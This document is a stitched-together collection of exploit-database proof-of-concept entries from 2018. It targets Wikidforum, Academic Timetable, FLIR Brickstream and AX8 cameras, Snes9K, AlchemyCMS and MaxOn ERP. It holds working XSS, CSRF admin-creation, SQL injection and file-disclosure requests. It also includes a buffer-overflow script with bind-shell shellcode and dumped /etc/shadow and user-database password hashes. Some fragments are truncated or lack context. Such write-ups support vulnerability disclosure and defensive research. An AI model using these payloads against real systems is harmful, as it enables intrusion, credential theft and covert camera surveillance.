SNMP_DESC=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E&SNMP_LOC%22%3E%3Csvg%2Fonload%3Dalert%282%29%3E&SNMP_CONT=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&SNMP_V1V2_ENABLE=SNMP_V1V2_ENABLE&SNMP1_LCOM_NAME=public&SNMP_TR_V1V2_1_IP=0.0.0.0&SNMP1_COM_NAME=public&SNMP_V1V2_TR1_VERSION=SNMP_V1V2_TR1_VERSION1&SNMP_TR_V1V2_2_IP=0.0.0.0&SNMP2_COM_NAME=public&SNMP_V1V2_TR2_VERSION=SNMP_V1V2_TR2_VERSION1&SUBMIT=SUBMIT
# Exploit Title: Wikidforum 2.20 - Cross-Site Scripting
# Date: 2018-10-10
# Exploit Author: Amir Hossein Mahboubi
# Vendor Homepage: https://sourceforge.net/projects/wikidforum/
# Software Link: https://sourceforge.net/projects/wikidforum/files/Wikidforum-com-ed.2.20.zip/download
# Version: <=2.20(Latest)
# Tested on: Linux & Windows
# Vulnerable POST parameter: reply_text
# HTTP Requests for injecting XSS as post comment:
# Pre condition: A loged in user can post comment, signup is possible for everyone
POST /test/exploit-db/wikidforum/rpc.php HTTP/1.1
Host: localhost:85
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:85/test/exploit-db/wikidforum/faq_1/forum-setup_8/requirements-for-installing-wikidforum_2.html
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 250
Cookie: PHPSESSID=5cnpc1euun68t8st3c9p1dsal5
Connection: close
Pragma: no-cache
Cache-Control: no-cache
action=applications/post/rpc.php&mode=submit_reply&title=Re: Requirements for installing WikidForum&parent_post_id=2&category_id=8&last_order_id=1&reply_text=<p><img src="/test/exploit-db/wikidforum/uploads/amir.jpg" onerror="alert(1)" alt="6" /></p>
# Exploit Title: Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://geoffpartridge.net/
# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
# Version: 7.0a-7.0b
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Description
# New admin can be added..
http://192.168.1.27/[PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb
GET [PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 01:10:29 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 910
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
/* `exploitdb`.`ms_user` */
$ms_user = array(
array('use_id' => '1testdb','use_name' => '1testdb','rol_id' => 'ADMIN','pwd' => '*6CC4E8CFFEAF202D7475BC906612F9A29A9C8117')
);
#
# Exploit Title: FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
# Author: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: http://www.brickstream.com
# Affected version: Firmware: 2.1.742.1842, Api: 1.0.0, Node: 0.10.33, Onvif: 0.1.1.47
# Tested on: Titan, Api/1.0.0
# References:
# ZSL-2018-5495
# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5495.php
# Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config
# download and file disclosure vulnerability when calling the ExportConfig REST
# API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive
# information and help her in authentication bypass, privilege escalation and/or
# full system access.
$ curl http://192.168.2.1:8083/getConfigExportFile.cgi
$ curl http://192.168.2.1:8083/restapi/system/ExportConfig
$ curl http://192.168.2.1:8083/restapi/system/ExportLogs
# Exploit Title: Snes9K 0.0.9z - Buffer Overflow (SEH)
# Date: 2018-10-13
# Exploit Author: Abdullah Alıç
# Vendor Homepage: https://sourceforge.net/projects/snes9k/
# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download
# Version: 0.0.9z
# Tested on: Windows XP Professional sp3(ENG)
# Category: Windows Local Exploit
# How to use: open the program go to "Netplay --> Options" paste the contents of boom.txt
# in Socket Port Number --> Connect victim machine on port 4444
#!/usr/bin/python
#msfvenom -p windows/shell_bind_tcp -b "\x00\x0a\x0d\x9f\x8f\x8e\x8d\x9e\x9d\xd0\xdd\xfd\xfe\xf0\xde" -f python
#352 bytes
buf = ""
buf += "\x2b\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\x43\x2b\x2a\x41\x83\xee\xfc\xe2\xf4\xbf\xc3"
buf += "\xa8\x41\x43\x2b\x4a\xc8\xa6\x1a\xea\x25\xc8\x7b\x1a"
buf += "\xca\x11\x27\xa1\x13\x57\xa0\x58\x69\x4c\x9c\x60\x67"
buf += "\x72\xd4\x86\x7d\x22\x57\x28\x6d\x63\xea\xe5\x4c\x42"
buf += "\xec\xc8\xb3\x11\x7c\xa1\x13\x53\xa0\x60\x7d\xc8\x67"
buf += "\x3b\x39\xa0\x63\x2b\x90\x12\xa0\x73\x61\x42\xf8\xa1"
buf += "\x08\x5b\xc8\x10\x08\xc8\x1f\xa1\x40\x95\x1a\xd5\xed"
buf += "\x82\xe4\x27\x40\x84\x13\xca\x34\xb5\x28\x57\xb9\x78"
buf += "\x56\x0e\x34\xa7\x73\xa1\x19\x67\x2a\xf9\x27\xc8\x27"
buf += "\x61\xca\x1b\x37\x2b\x92\xc8\x2f\xa1\x40\x93\xa2\x6e"
buf += "\x65\x67\x70\x71\x20\x1a\x71\x7b\xbe\xa3\x74\x75\x1b"
buf += "\xc8\x39\xc1\xcc\x1e\x43\x19\x73\x43\x2b\x42\x36\x30"
buf += "\x19\x75\x15\x2b\x67\x5d\x67\x44\xd4\xff\xf9\xd3\x2a"
buf += "\x2a\x41\x6a\xef\x7e\x11\x2b\x02\xaa\x2a\x43\xd4\xff"
buf += "\x2b\x4b\x72\x7a\xa3\xbe\x6b\x7a\x01\x13\x43\xc0\x4e"
buf += "\x9c\xcb\xd5\x94\xd4\x43\x28\x41\x52\x77\xa3\xa7\x29"
buf += "\x3b\x7c\x16\x2b\xe9\xf1\x76\x24\xd4\xff\x16\x2b\x9c"
buf += "\xc3\x79\xbc\xd4\xff\x16\x2b\x5f\xc6\x7a\xa2\xd4\xff"
buf += "\x16\xd4\x43\x5f\x2f\x0e\x4a\xd5\x94\x2b\x48\x47\x25"
buf += "\x43\xa2\xc9\x16\x14\x7c\x1b\xb7\x29\x39\x73\x17\xa1"
buf += "\xd6\x4c\x86\x07\x0f\x16\x40\x42\xa6\x6e\x65\x53\xed"
buf += "\x2a\x05\x17\x7b\x7c\x17\x15\x6d\x7c\x0f\x15\x7d\x79"
buf += "\x17\x2b\x52\xe6\x7e\xc5\xd4\xff\xc8\xa3\x65\x7c\x07"
buf += "\xbc\x1b\x42\x49\xc4\x36\x4a\xbe\x96\x90\xda\xf4\xe1"
buf += "\x7d\x42\xe7\xd6\x96\xb7\xbe\x96\x17\x2c\x3d\x49\xab"
buf += "\xd1\xa1\x36\x2e\x91\x06\x50\x59\x45\x2b\x43\x78\xd5"
buf += "\x94"
nseh= "\xeb\x06\x90\x90"
seh = "\x39\x1f\xd1\x72" #POP-POP-RET msacm32.drv
buffer = "\x90" * 244 + nseh + seh + buf + "\x90"*20
payload = buffer
try:
f=open("boom.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure
# Auhor: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16, 1.17.13
# OS: neco_v1.8-0-g7ffe5b3
# Hardware: Flir Systems Neco Board
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
# References:
# Advisory ID: ZSL-2018-5493
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5493.php
# Desc: The FLIR AX8 thermal sensor camera suffers from an unauthenticated arbitrary
# file disclosure vulnerability. Input passed via the 'file' parameter in download.php
# is not properly verified before being used to download config files. This can be
# exploited to disclose the contents of arbitrary files via absolute path.
# PoC
# 1. GET http://TARGET/download.php?file=/etc/passwd HTTP/1.1
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:x:999:998::/var/lib/dbus:/bin/false
fliruser:x:1000:1000::/home/fliruser:/bin/sh
xuser:x:1001:1001::/home/xuser:/bin/sh
sshd:x:998:995::/var/run/sshd:/bin/false
avahi:x:997:994::/var/run/avahi-daemon:/bin/false
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
# 2. GET http://TARGET/download.php?file=/etc/shadow HTTP/1.1
root:qA7LRQDa1amZM:17339:0:99999:7:::
daemon:*:17339:0:99999:7:::
bin:*:17339:0:99999:7:::
sys:*:17339:0:99999:7:::
sync:*:17339:0:99999:7:::
games:*:17339:0:99999:7:::
man:*:17339:0:99999:7:::
lp:*:17339:0:99999:7:::
mail:*:17339:0:99999:7:::
news:*:17339:0:99999:7:::
uucp:*:17339:0:99999:7:::
proxy:*:17339:0:99999:7:::
www-data:*:17339:0:99999:7:::
backup:*:17339:0:99999:7:::
list:*:17339:0:99999:7:::
irc:*:17339:0:99999:7:::
gnats:*:17339:0:99999:7:::
nobody:*:17339:0:99999:7:::
messagebus:!:17339:0:99999:7:::
fliruser:m1iiKYIJr63u2:17339:0:99999:7:::
xuser:!:17339:0:99999:7:::
sshd:!:17339:0:99999:7:::
avahi:!:17339:0:99999:7:::
avahi-autoipd:!:17339:0:99999:7:::
# 3. GET http://TARGET/download.php?file=/FLIR/system/profile.d/userPreset.tar HTTP/1.1
# GET http://TARGET/download.php?file=/FLIR/usr/www/FLIR/db/users.db HTTP/1.1
lqwrm@metalgear:~/$ sqlite3 users.db
SQLite version 3.11.0 2016-02-15 17:29:24
Enter ".help" for usage hints.
sqlite> .tables
roles users
sqlite> select * from roles;
1|admin
2|user
3|viewer
sqlite> select * from users;
1|admin||$2y$10$/J/KDhh0.UDg5pbwtPG9B.W2gEWrS36qHji1scgxO7uiTk1GuAa.K|1
2|user||$2y$10$O5Ybml6qN9caTjezQR0f8.z230PavQYUwmZCzMVxL6BMeNvLWEr9q|2
3|viewer||$2y$10$lxA0o325EuUtVAaTItBt.OSpZSfxIrT56ntm7326FQ/fTBc0ODWqq|3
4|service||$2y$10$syAL0yMLBfN/8.sciVnCE.kBto6mtVvjrmyhPQAo7oV3rq8X8pBke|4
5|developer||$2y$10$LBNcMBC/Bn3VVnhlI1j7huOZ.UOykGaq3VZ.YAgu0mAZXAQ8q36uG|5
sqlite>.q
# Exploit Title: AlchemyCMS 4.1 - Cross-Site Scripting
# Date: 2018-10-14
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://alchemy-cms.com/
# Software Link : https://github.com/AlchemyCMS/alchemy_cms
# Software : AlchemyCMS
# Version : 4.1-stable
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : N/A
# A Stored XSS vulnerability has been discovered in version 4.1.0 of AlchemyCMS via the /admin/pictures image field.
# HTTP POST Request :
POST /admin/pictures HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/admin/pages/80/edit
X-CSRF-Token: E6zZ6vohGua9Q0arzQVTUTmq/fJw48xBnkmfQeYxILYtmRAhDcxkaV5FeGyajgOtSXMs7r9xms7Wo44PEP9HTg==
X-Requested-With: XMLHttpRequest
Content-Length: 1574870
Content-Type: multipart/form-data; boundary=---------------------------10875577401849011681645409128
Cookie: _alchemy_demo_session=%2BSKdSGUIZALtIkYucZKu36eXcVTh4kSCFKjcxqLyFnd%2B5C87xtdx6%2B4Zkjy31YpXRzXI1nwu3BsIvI9v6eYio%2BOh1S3Kb1wd3YcARJTGJeK8ByX9N45trldIwmxK09FqDTMv897K3%2F%2Fe05YiJUEwz2jGkuXkiaxk37AHmjuJNtSNwLfGwAakOWN%2FKQvqAbl%2BMWV9crpeUuq66p6%2Bar1WmGmRcNDqUcfnDFfLmNa8%2BlCBNjieI5N0kpAv2xBJ30EZqoxee13TmKhvPoU4m3UehLKToa8gW5tCQQy7N3BF6ipZa5H1l16%2FxzwPEJl37F3T5%2F%2FkFr4JOxtYSiH9Nd1itpJjMBSZkGAou49SZoBq%2F23r%2BbENN81HrstL2TlaHkxeFdivOnAjBgwpst1qj570WU22FOQeKo80fWnARs23lCHAJy2RyY8dENcpagIQUgdbxqlCaEDqcUnnroZj0g8mhjG%2FdD2cLdym3usSVBmLoiVIPTcHf5T%2FavLUpF6PC0hUwgNEwgNZKzunlPl8tr17e9t9--RjgT8BiSM30kK4WY--s%2BPgcdnz62DCJTK14z5aag%3D%3D; __atuvc=3%7C42; __atuvs=5bc38ae909d900c3002
Connection: close
-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="utf8"
â
-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="authenticity_token"
GqjmyJ8FM+6rE6IIK5Or6Znszlg8ilvkUKsYJsqT3l3Cl7GAKn8L6xoCio55o9IaxztHwOKOSsRHz5vb4LTOGA==
-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="picture[upload_hash]"
2507832911685091350
-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="picture[image_file]"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg
# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
# References:
# Advisory ID: ZSL-2018-5492
# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php
# Desc: The FLIR AX8 thermal sensor camera suffers an unauthenticated and unauthorized
# live RTSP video stream access.
# PoC
$ cvlc rtsp://TARGET/mpeg4 --fullscreen
$ ffmpeg -i rtsp://TARGET/mpeg4 -b 7000k -vcodec copy -r 60 -y ./meltdown.mp4
$ ffplay rtsp://TARGET/mpeg4
$ wget http://TARGET/snapshot.jpg ; eog snapshot.jpg
# PoC - To freeze the stream:
$ curl -d "action=set&resource=.image.state.freeze.set&value=true" -X POST http://TARGET/res.php
# Exploit Title: MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
# Dork: N/A
# Date: 2018-10-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.talagasoft.com
# Software Link: http://demo.maxonerp.com/
# Software Download: https://datapacket.dl.sourceforge.net/project/maxon/maxon.rar
# Version: 8.x-9.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# Description
# All users can run sql injection codes.
#
# [PATH]/pos/controllers/User.php Line:350
# [PATH]/application/controllers/User.php Line:414
# function log_activity(){
# $sql="select * from syslog where 1=1";
# $nomor="";$jenis="";$user="";
# if($this->input->post()){
# if($nomor=$this->input->post('nomor')){
# if($nomor!="")$sql.=" and no_bukti='$nomor'";
# }
# if($user=$this->input->post('user')){
# if($user!="")$sql.=" and userid='$user'";
# }
# if($jenis=$this->input->post('jenis')){
# if($jenis!="")$sql.=" and jenis_cmd='$jenis'";
# }
#
# }
# $sql.=" order by tgljam desc limit 1000";
# $data["user"]=$user;
# $data["nomor"]=$nomor;
# $data["jenis"]=$jenis;
#
# $data['syslog']=$this->db->query($sql);
# $this->template->display("log_list",$data);
# }
# POC:
# 1)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
nomor=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:22:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 252
user=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:29:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
jenis=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:35:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8